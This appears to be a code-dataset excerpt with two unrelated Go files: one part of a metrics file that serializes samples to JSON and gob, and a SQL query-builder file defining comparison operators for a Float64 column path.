func (m Metric) LastSample() *Sample {
if m.Samples == nil || m.Samples.IsNil() {
return nil
}
s := m.Samples.Head().(Sample)
return &s
}
// WireMetrics is the on-the-wire representation of Metrics.
type WireMetrics struct {
Samples []Sample `json:"samples"` // On the wire, samples are sorted oldest to newest,
Min float64 `json:"min"` // the opposite order to how we store them internally.
Max float64 `json:"max"`
First string `json:"first,omitempty"`
Last string `json:"last,omitempty"`
}
func renderTime(t time.Time) string {
if t.IsZero() {
return ""
}
return t.Format(time.RFC3339Nano)
}
func parseTime(s string) time.Time {
t, _ := time.Parse(time.RFC3339Nano, s)
return t
}
func (m Metric) toIntermediate() WireMetrics {
samples := []Sample{}
if m.Samples != nil {
m.Samples.Reverse().ForEach(func(s interface{}) {
samples = append(samples, s.(Sample))
})
}
return WireMetrics{
Samples: samples,
Max: m.Max,
Min: m.Min,
First: renderTime(m.First),
Last: renderTime(m.Last),
}
}
func (m WireMetrics) fromIntermediate() Metric {
samples := ps.NewList()
for _, s := range m.Samples {
samples = samples.Cons(s)
}
return Metric{
Samples: samples,
Max: m.Max,
Min: m.Min,
First: parseTime(m.First),
Last: parseTime(m.Last),
}
}
// MarshalJSON implements json.Marshaller
func (m Metric) MarshalJSON() ([]byte, error) {
buf := bytes.Buffer{}
in := m.toIntermediate()
err := json.NewEncoder(&buf).Encode(in)
return buf.Bytes(), err
}
// UnmarshalJSON implements json.Unmarshaler
func (m *Metric) UnmarshalJSON(input []byte) error {
in := WireMetrics{}
if err := json.NewDecoder(bytes.NewBuffer(input)).Decode(&in); err != nil {
return err
}
*m = in.fromIntermediate()
return nil
}
// GobEncode implements gob.Marshaller
func (m Metric) GobEncode() ([]byte, error) {
buf := bytes.Buffer{}
err := gob.NewEncoder(&buf).Encode(m.toIntermediate())
return buf.Bytes(), err
}
// GobDecode implements gob.Unmarshaller
func (m *Metric) GobDecode(input []byte) error {
in := WireMetrics{}
if err := gob.NewDecoder(bytes.NewBuffer(input)).Decode(&in); err != nil {
return err
}
*m = in.fromIntermediate()
return nil
} | report/metrics.go | 0.845113 | 0.410284 | metrics.go | starcoder |
package path
import (
"github.com/weworksandbox/lingo"
"github.com/weworksandbox/lingo/expr"
"github.com/weworksandbox/lingo/expr/operator"
"github.com/weworksandbox/lingo/expr/set"
"github.com/weworksandbox/lingo/sql"
)
func NewFloat64WithAlias(e lingo.Table, name, alias string) Float64 {
return Float64{
entity: e,
name: name,
alias: alias,
}
}
func NewFloat64(e lingo.Table, name string) Float64 {
return NewFloat64WithAlias(e, name, "")
}
type Float64 struct {
entity lingo.Table
name string
alias string
}
func (p Float64) GetParent() lingo.Table {
return p.entity
}
func (p Float64) GetName() string {
return p.name
}
func (p Float64) GetAlias() string {
return p.alias
}
func (p Float64) As(alias string) Float64 {
p.alias = alias
return p
}
func (p Float64) ToSQL(d lingo.Dialect) (sql.Data, error) {
return ExpandColumnWithDialect(d, p)
}
func (p Float64) To(value float64) set.Set {
return set.To(p, expr.NewValue(value))
}
func (p Float64) ToExpr(exp lingo.Expression) set.Set {
return set.To(p, exp)
}
func (p Float64) Eq(value float64) operator.Binary {
return operator.Eq(p, expr.NewValue(value))
}
func (p Float64) EqPath(exp lingo.Expression) operator.Binary {
return operator.Eq(p, exp)
}
func (p Float64) NotEq(value float64) operator.Binary {
return operator.NotEq(p, expr.NewValue(value))
}
func (p Float64) NotEqPath(exp lingo.Expression) operator.Binary {
return operator.NotEq(p, exp)
}
func (p Float64) LT(value float64) operator.Binary {
return operator.LessThan(p, expr.NewValue(value))
}
func (p Float64) LTPath(exp lingo.Expression) operator.Binary {
return operator.LessThan(p, exp)
}
func (p Float64) LTOrEq(value float64) operator.Binary {
return operator.LessThanOrEqual(p, expr.NewValue(value))
}
func (p Float64) LTOrEqPath(exp lingo.Expression) operator.Binary {
return operator.LessThanOrEqual(p, exp)
}
func (p Float64) GT(value float64) operator.Binary {
return operator.GreaterThan(p, expr.NewValue(value))
}
func (p Float64) GTPath(exp lingo.Expression) operator.Binary {
return operator.GreaterThan(p, exp)
}
func (p Float64) GTOrEq(value float64) operator.Binary {
return operator.GreaterThanOrEqual(p, expr.NewValue(value))
}
func (p Float64) GTOrEqPath(exp lingo.Expression) operator.Binary {
return operator.GreaterThanOrEqual(p, exp)
}
func (p Float64) IsNull() operator.Unary {
return operator.IsNull(p)
}
func (p Float64) IsNotNull() operator.Unary {
return operator.IsNotNull(p)
}
func (p Float64) In(values ...float64) operator.Binary {
return operator.In(p, expr.NewParens(expr.NewValue(values)))
}
func (p Float64) InPaths(exps ...lingo.Expression) operator.Binary {
return operator.In(p, expr.NewParens(expr.ToList(exps)))
}
func (p Float64) NotIn(values ...float64) operator.Binary {
return operator.NotIn(p, expr.NewParens(expr.NewValue(values)))
}
func (p Float64) NotInPaths(exps ...lingo.Expression) operator.Binary {
return operator.NotIn(p, expr.NewParens(expr.ToList(exps)))
}
func (p Float64) Between(first, second float64) operator.Binary {
return operator.Between(p, expr.NewValue(first), expr.NewValue(second))
}
func (p Float64) BetweenPaths(first, second lingo.Expression) operator.Binary {
return operator.Between(p, first, second)
}
func (p Float64) NotBetween(first, second float64) operator.Binary {
return operator.NotBetween(p, expr.NewValue(first), expr.NewValue(second))
}
func (p Float64) NotBetweenPaths(first, second lingo.Expression) operator.Binary {
return operator.NotBetween(p, first, second)
} | expr/path/float64.go | 0.700997 | 0.44342 | float64.go | starcoder |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.